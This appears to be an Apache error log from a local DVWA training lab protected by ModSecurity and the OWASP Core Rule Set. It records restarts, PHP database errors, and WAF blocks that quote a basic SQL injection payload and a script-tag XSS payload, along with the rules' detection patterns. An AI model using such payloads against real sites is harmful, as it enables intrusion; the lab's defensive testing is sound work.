[Wed Jul 15 18:38:20.319161 2026] [mpm_prefork:notice] [pid 2520:tid 2520] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 18:38:20.319307 2026] [core:notice] [pid 2520:tid 2520] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 19:25:36.470471 2026] [mpm_prefork:notice] [pid 2506:tid 2506] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 19:25:36.472516 2026] [core:notice] [pid 2506:tid 2506] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 19:27:30.135358 2026] [php:error] [pid 2509:tid 2509] [client 127.0.0.1:43930] PHP Fatal error:  Uncaught mysqli_sql_exception: Connection refused in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php:570\nStack trace:\n#0 /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php(570): mysqli_connect()\n#1 /var/www/html/DVWA/login.php(8): dvwaDatabaseConnect()\n#2 {main}\n  thrown in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php on line 570
[Wed Jul 15 20:46:21.415422 2026] [php:error] [pid 2513:tid 2513] [client 127.0.0.1:60452] PHP Fatal error:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1==1'' at line 1 in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php:11\nStack trace:\n#0 /var/www/html/DVWA/vulnerabilities/sqli/source/low.php(11): mysqli_query()\n#1 /var/www/html/DVWA/vulnerabilities/sqli/index.php(34): require_once('...')\n#2 {main}\n  thrown in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php on line 11, referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
[Wed Jul 15 20:51:01.548173 2026] [mpm_prefork:notice] [pid 2506:tid 2506] AH00170: caught SIGWINCH, shutting down gracefully
[Wed Jul 15 20:51:01.817427 2026] [security2:notice] [pid 4618:tid 4618] ModSecurity for Apache/2.9.13 (http://www.modsecurity.org/) configured.
[Wed Jul 15 20:51:01.817550 2026] [security2:notice] [pid 4618:tid 4618] ModSecurity: APR compiled version="1.7.6"; loaded version="1.7.2"
[Wed Jul 15 20:51:01.817554 2026] [security2:warn] [pid 4618:tid 4618] ModSecurity: Loaded APR do not match with compiled!
[Wed Jul 15 20:51:01.817557 2026] [security2:notice] [pid 4618:tid 4618] ModSecurity: PCRE2 compiled version="10.46 "; loaded version="10.46 2025-08-27"
[Wed Jul 15 20:51:01.817559 2026] [security2:notice] [pid 4618:tid 4618] ModSecurity: LUA compiled version="Lua 5.1"
[Wed Jul 15 20:51:01.817561 2026] [security2:notice] [pid 4618:tid 4618] ModSecurity: YAJL compiled version="2.1.0"
[Wed Jul 15 20:51:01.817563 2026] [security2:notice] [pid 4618:tid 4618] ModSecurity: LIBXML compiled version="2.15.2"
[Wed Jul 15 20:51:01.817565 2026] [security2:notice] [pid 4618:tid 4618] ModSecurity: Status engine is currently disabled, enable it by set SecStatusEngine to On.
[Wed Jul 15 20:51:02.013153 2026] [mpm_prefork:notice] [pid 4619:tid 4619] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 20:51:02.013197 2026] [core:notice] [pid 4619:tid 4619] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 20:56:51.011358 2026] [php:error] [pid 4634:tid 4634] [client 127.0.0.1:39366] PHP Fatal error:  Uncaught mysqli_sql_exception: Connection refused in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php:570\nStack trace:\n#0 /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php(570): mysqli_connect()\n#1 /var/www/html/DVWA/vulnerabilities/sqli/index.php(14): dvwaDatabaseConnect()\n#2 {main}\n  thrown in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php on line 570, referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
[Wed Jul 15 20:59:57.079521 2026] [php:error] [pid 4727:tid 4727] [client 127.0.0.1:56156] PHP Fatal error:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1 in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php:11\nStack trace:\n#0 /var/www/html/DVWA/vulnerabilities/sqli/source/low.php(11): mysqli_query()\n#1 /var/www/html/DVWA/vulnerabilities/sqli/index.php(34): require_once('...')\n#2 {main}\n  thrown in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php on line 11, referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=0&Submit=Submit
[Wed Jul 15 21:05:25.765668 2026] [mpm_prefork:notice] [pid 4619:tid 4619] AH00170: caught SIGWINCH, shutting down gracefully
[Wed Jul 15 21:05:25.988721 2026] [security2:notice] [pid 5011:tid 5011] ModSecurity for Apache/2.9.13 (http://www.modsecurity.org/) configured.
[Wed Jul 15 21:05:25.988760 2026] [security2:notice] [pid 5011:tid 5011] ModSecurity: APR compiled version="1.7.6"; loaded version="1.7.2"
[Wed Jul 15 21:05:25.988763 2026] [security2:warn] [pid 5011:tid 5011] ModSecurity: Loaded APR do not match with compiled!
[Wed Jul 15 21:05:25.988765 2026] [security2:notice] [pid 5011:tid 5011] ModSecurity: PCRE2 compiled version="10.46 "; loaded version="10.46 2025-08-27"
[Wed Jul 15 21:05:25.988766 2026] [security2:notice] [pid 5011:tid 5011] ModSecurity: LUA compiled version="Lua 5.1"
[Wed Jul 15 21:05:25.988767 2026] [security2:notice] [pid 5011:tid 5011] ModSecurity: YAJL compiled version="2.1.0"
[Wed Jul 15 21:05:25.988768 2026] [security2:notice] [pid 5011:tid 5011] ModSecurity: LIBXML compiled version="2.15.2"
[Wed Jul 15 21:05:25.988770 2026] [security2:notice] [pid 5011:tid 5011] ModSecurity: Status engine is currently disabled, enable it by set SecStatusEngine to On.
[Wed Jul 15 21:05:26.138048 2026] [mpm_prefork:notice] [pid 5012:tid 5012] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 21:05:26.138080 2026] [core:notice] [pid 5012:tid 5012] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 21:07:51.302449 2026] [mpm_prefork:notice] [pid 5012:tid 5012] AH00170: caught SIGWINCH, shutting down gracefully
[Wed Jul 15 21:07:51.454040 2026] [security2:notice] [pid 5078:tid 5078] ModSecurity for Apache/2.9.13 (http://www.modsecurity.org/) configured.
[Wed Jul 15 21:07:51.454080 2026] [security2:notice] [pid 5078:tid 5078] ModSecurity: APR compiled version="1.7.6"; loaded version="1.7.2"
[Wed Jul 15 21:07:51.454082 2026] [security2:warn] [pid 5078:tid 5078] ModSecurity: Loaded APR do not match with compiled!
[Wed Jul 15 21:07:51.454084 2026] [security2:notice] [pid 5078:tid 5078] ModSecurity: PCRE2 compiled version="10.46 "; loaded version="10.46 2025-08-27"
[Wed Jul 15 21:07:51.454085 2026] [security2:notice] [pid 5078:tid 5078] ModSecurity: LUA compiled version="Lua 5.1"
[Wed Jul 15 21:07:51.454086 2026] [security2:notice] [pid 5078:tid 5078] ModSecurity: YAJL compiled version="2.1.0"
[Wed Jul 15 21:07:51.454088 2026] [security2:notice] [pid 5078:tid 5078] ModSecurity: LIBXML compiled version="2.15.2"
[Wed Jul 15 21:07:51.454089 2026] [security2:notice] [pid 5078:tid 5078] ModSecurity: Status engine is currently disabled, enable it by set SecStatusEngine to On.
[Wed Jul 15 21:07:51.586613 2026] [mpm_prefork:notice] [pid 5079:tid 5079] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 21:07:51.586644 2026] [core:notice] [pid 5079:tid 5079] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 21:46:34.211207 2026] [mpm_prefork:notice] [pid 5079:tid 5079] AH00169: caught SIGTERM, shutting down
[Wed Jul 15 22:04:49.871962 2026] [security2:notice] [pid 2607:tid 2607] ModSecurity for Apache/2.9.13 (http://www.modsecurity.org/) configured.
[Wed Jul 15 22:04:49.873212 2026] [security2:notice] [pid 2607:tid 2607] ModSecurity: APR compiled version="1.7.6"; loaded version="1.7.2"
[Wed Jul 15 22:04:49.873219 2026] [security2:warn] [pid 2607:tid 2607] ModSecurity: Loaded APR do not match with compiled!
[Wed Jul 15 22:04:49.873222 2026] [security2:notice] [pid 2607:tid 2607] ModSecurity: PCRE2 compiled version="10.46 "; loaded version="10.46 2025-08-27"
[Wed Jul 15 22:04:49.873223 2026] [security2:notice] [pid 2607:tid 2607] ModSecurity: LUA compiled version="Lua 5.1"
[Wed Jul 15 22:04:49.873225 2026] [security2:notice] [pid 2607:tid 2607] ModSecurity: YAJL compiled version="2.1.0"
[Wed Jul 15 22:04:49.873227 2026] [security2:notice] [pid 2607:tid 2607] ModSecurity: LIBXML compiled version="2.15.2"
[Wed Jul 15 22:04:49.873235 2026] [security2:notice] [pid 2607:tid 2607] ModSecurity: Status engine is currently disabled, enable it by set SecStatusEngine to On.
[Wed Jul 15 22:04:50.101742 2026] [mpm_prefork:notice] [pid 2608:tid 2608] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 22:04:50.101772 2026] [core:notice] [pid 2608:tid 2608] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 22:10:22.729255 2026] [mpm_prefork:notice] [pid 2608:tid 2608] AH00170: caught SIGWINCH, shutting down gracefully
[Wed Jul 15 22:10:22.818970 2026] [security2:notice] [pid 3249:tid 3249] ModSecurity for Apache/2.9.13 (http://www.modsecurity.org/) configured.
[Wed Jul 15 22:10:22.819003 2026] [security2:notice] [pid 3249:tid 3249] ModSecurity: APR compiled version="1.7.6"; loaded version="1.7.2"
[Wed Jul 15 22:10:22.819005 2026] [security2:warn] [pid 3249:tid 3249] ModSecurity: Loaded APR do not match with compiled!
[Wed Jul 15 22:10:22.819006 2026] [security2:notice] [pid 3249:tid 3249] ModSecurity: PCRE2 compiled version="10.46 "; loaded version="10.46 2025-08-27"
[Wed Jul 15 22:10:22.819008 2026] [security2:notice] [pid 3249:tid 3249] ModSecurity: LUA compiled version="Lua 5.1"
[Wed Jul 15 22:10:22.819009 2026] [security2:notice] [pid 3249:tid 3249] ModSecurity: YAJL compiled version="2.1.0"
[Wed Jul 15 22:10:22.819010 2026] [security2:notice] [pid 3249:tid 3249] ModSecurity: LIBXML compiled version="2.15.2"
[Wed Jul 15 22:10:22.819011 2026] [security2:notice] [pid 3249:tid 3249] ModSecurity: Status engine is currently disabled, enable it by set SecStatusEngine to On.
[Wed Jul 15 22:10:22.878822 2026] [mpm_prefork:notice] [pid 3250:tid 3250] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 22:10:22.878841 2026] [core:notice] [pid 3250:tid 3250] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 22:14:17.527839 2026] [mpm_prefork:notice] [pid 3250:tid 3250] AH00170: caught SIGWINCH, shutting down gracefully
[Wed Jul 15 22:14:17.657517 2026] [security2:notice] [pid 3393:tid 3393] ModSecurity for Apache/2.9.13 (http://www.modsecurity.org/) configured.
[Wed Jul 15 22:14:17.657568 2026] [security2:notice] [pid 3393:tid 3393] ModSecurity: APR compiled version="1.7.6"; loaded version="1.7.2"
[Wed Jul 15 22:14:17.657571 2026] [security2:warn] [pid 3393:tid 3393] ModSecurity: Loaded APR do not match with compiled!
[Wed Jul 15 22:14:17.657574 2026] [security2:notice] [pid 3393:tid 3393] ModSecurity: PCRE2 compiled version="10.46 "; loaded version="10.46 2025-08-27"
[Wed Jul 15 22:14:17.657576 2026] [security2:notice] [pid 3393:tid 3393] ModSecurity: LUA compiled version="Lua 5.1"
[Wed Jul 15 22:14:17.657578 2026] [security2:notice] [pid 3393:tid 3393] ModSecurity: YAJL compiled version="2.1.0"
[Wed Jul 15 22:14:17.657581 2026] [security2:notice] [pid 3393:tid 3393] ModSecurity: LIBXML compiled version="2.15.2"
[Wed Jul 15 22:14:17.657583 2026] [security2:notice] [pid 3393:tid 3393] ModSecurity: Status engine is currently disabled, enable it by set SecStatusEngine to On.
[Wed Jul 15 22:14:17.741092 2026] [mpm_prefork:notice] [pid 3394:tid 3394] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 22:14:17.741132 2026] [core:notice] [pid 3394:tid 3394] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 22:17:34.510966 2026] [mpm_prefork:notice] [pid 3394:tid 3394] AH00170: caught SIGWINCH, shutting down gracefully
[Wed Jul 15 22:18:53.926479 2026] [mpm_prefork:notice] [pid 3624:tid 3624] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 22:18:53.926529 2026] [core:notice] [pid 3624:tid 3624] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 22:23:47.163679 2026] [mpm_prefork:notice] [pid 3624:tid 3624] AH00170: caught SIGWINCH, shutting down gracefully
[Wed Jul 15 22:23:47.279084 2026] [mpm_prefork:notice] [pid 4200:tid 4200] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 22:23:47.279133 2026] [core:notice] [pid 4200:tid 4200] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 22:38:24.039858 2026] [mpm_prefork:notice] [pid 4200:tid 4200] AH00170: caught SIGWINCH, shutting down gracefully
[Wed Jul 15 22:38:24.198688 2026] [security2:notice] [pid 5755:tid 5755] ModSecurity for Apache/2.9.13 (http://www.modsecurity.org/) configured.
[Wed Jul 15 22:38:24.198755 2026] [security2:notice] [pid 5755:tid 5755] ModSecurity: APR compiled version="1.7.6"; loaded version="1.7.2"
[Wed Jul 15 22:38:24.198759 2026] [security2:warn] [pid 5755:tid 5755] ModSecurity: Loaded APR do not match with compiled!
[Wed Jul 15 22:38:24.198762 2026] [security2:notice] [pid 5755:tid 5755] ModSecurity: PCRE2 compiled version="10.46 "; loaded version="10.46 2025-08-27"
[Wed Jul 15 22:38:24.198763 2026] [security2:notice] [pid 5755:tid 5755] ModSecurity: LUA compiled version="Lua 5.1"
[Wed Jul 15 22:38:24.198765 2026] [security2:notice] [pid 5755:tid 5755] ModSecurity: YAJL compiled version="2.1.0"
[Wed Jul 15 22:38:24.198766 2026] [security2:notice] [pid 5755:tid 5755] ModSecurity: LIBXML compiled version="2.15.2"
[Wed Jul 15 22:38:24.198773 2026] [security2:notice] [pid 5755:tid 5755] ModSecurity: Status engine is currently disabled, enable it by set SecStatusEngine to On.
[Wed Jul 15 22:38:24.480433 2026] [mpm_prefork:notice] [pid 5756:tid 5756] AH00163: Apache/2.4.61 (Debian) configured -- resuming normal operations
[Wed Jul 15 22:38:24.480501 2026] [core:notice] [pid 5756:tid 5756] AH00094: Command line: '/usr/sbin/apache2'
[Wed Jul 15 22:39:32.298024 2026] [security2:error] [pid 5763:tid 5763] [client 127.0.0.1:55956] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf-FJv5LA6p2XNixvlQzQAAAAA"]
[Wed Jul 15 22:39:32.300476 2026] [security2:error] [pid 5763:tid 5763] [client 127.0.0.1:55956] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&sos' [file "/etc/modsecurity/crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "66"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&sos found within ARGS:id: 1' OR '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-SQLI"] [tag "capec/1000/152/248/66"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf-FJv5LA6p2XNixvlQzQAAAAA"]
[Wed Jul 15 22:39:32.312499 2026] [security2:error] [pid 5763:tid 5763] [client 127.0.0.1:55956] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/etc/modsecurity/crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "233"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "anomaly-evaluation"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf-FJv5LA6p2XNixvlQzQAAAAA"]
[Wed Jul 15 22:39:32.312699 2026] [security2:error] [pid 5763:tid 5763] [client 127.0.0.1:55956] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=8, detection=8, per_pl=8-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=5, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=8)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf-FJv5LA6p2XNixvlQzQAAAAA"]
[Wed Jul 15 22:46:20.720097 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:57304] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/"] [unique_id "alf_rP6csk-W9Z63kDBqMAAAAAI"]
[Wed Jul 15 22:46:20.737232 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:57304] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "102"] [id "941100"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: XSS data found within ARGS:default: <script>window.location('https://127.0.0.1"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/"] [unique_id "alf_rP6csk-W9Z63kDBqMAAAAAI"]
[Wed Jul 15 22:46:20.737315 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:57304] ModSecurity: Warning. Pattern match "(?i)<script[^>]*>[\\\\s\\\\S]*?" at ARGS:default. [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "130"] [id "941110"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script> found within ARGS:default: <script>window.location('https://127.0.0.1"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/"] [unique_id "alf_rP6csk-W9Z63kDBqMAAAAAI"]
[Wed Jul 15 22:46:20.737857 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:57304] ModSecurity: Warning. Pattern match "(?i)<[^0-9<>A-Z_a-z]*(?:[^\\\\s\\\\x0b\\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0- ..." at ARGS:default. [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "273"] [id "941160"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <script found within ARGS:default: <script>window.location('https://127.0.0.1"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/"] [unique_id "alf_rP6csk-W9Z63kDBqMAAAAAI"]
[Wed Jul 15 22:46:20.737997 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:57304] ModSecurity: Warning. Matched phrase "window.location" at ARGS:default. [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "332"] [id "941180"] [msg "Node-Validator Deny List Keywords"] [data "Matched Data: window.location found within ARGS:default: <script>window.location('https://127.0.0.1"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-nodejs"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/"] [unique_id "alf_rP6csk-W9Z63kDBqMAAAAAI"]
[Wed Jul 15 22:46:20.739898 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:57304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/etc/modsecurity/crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "233"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 23)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "anomaly-evaluation"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/"] [unique_id "alf_rP6csk-W9Z63kDBqMAAAAAI"]
[Wed Jul 15 22:46:20.744792 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:57304] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=23, detection=23, per_pl=23-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=20, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=23)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/"] [unique_id "alf_rP6csk-W9Z63kDBqMAAAAAI"]
[Wed Jul 15 22:46:28.903346 2026] [security2:error] [pid 5766:tid 5766] [client 127.0.0.1:57318] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf_tL8V_730FIs4GP3RsQAAAAM"], referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:46:28.930044 2026] [security2:error] [pid 5766:tid 5766] [client 127.0.0.1:57318] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=3, detection=3, per_pl=3-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=3)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/index.php"] [unique_id "alf_tL8V_730FIs4GP3RsQAAAAM"], referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:46:28.977181 2026] [security2:error] [pid 5766:tid 5766] [client 127.0.0.1:57318] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/login.php"] [unique_id "alf_tL8V_730FIs4GP3RsgAAAAM"], referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:46:28.979317 2026] [php:error] [pid 5766:tid 5766] [client 127.0.0.1:57318] PHP Fatal error:  Uncaught mysqli_sql_exception: Connection refused in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php:570\nStack trace:\n#0 /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php(570): mysqli_connect()\n#1 /var/www/html/DVWA/login.php(8): dvwaDatabaseConnect()\n#2 {main}\n  thrown in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php on line 570, referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:46:28.990123 2026] [security2:error] [pid 5766:tid 5766] [client 127.0.0.1:57318] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=3, detection=3, per_pl=3-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=3)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/login.php"] [unique_id "alf_tL8V_730FIs4GP3RsgAAAAM"], referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:46:34.092780 2026] [security2:error] [pid 5767:tid 5767] [client 127.0.0.1:48982] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/login.php"] [unique_id "alf_unnTQ49Xc0qkfdD30wAAAAQ"], referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
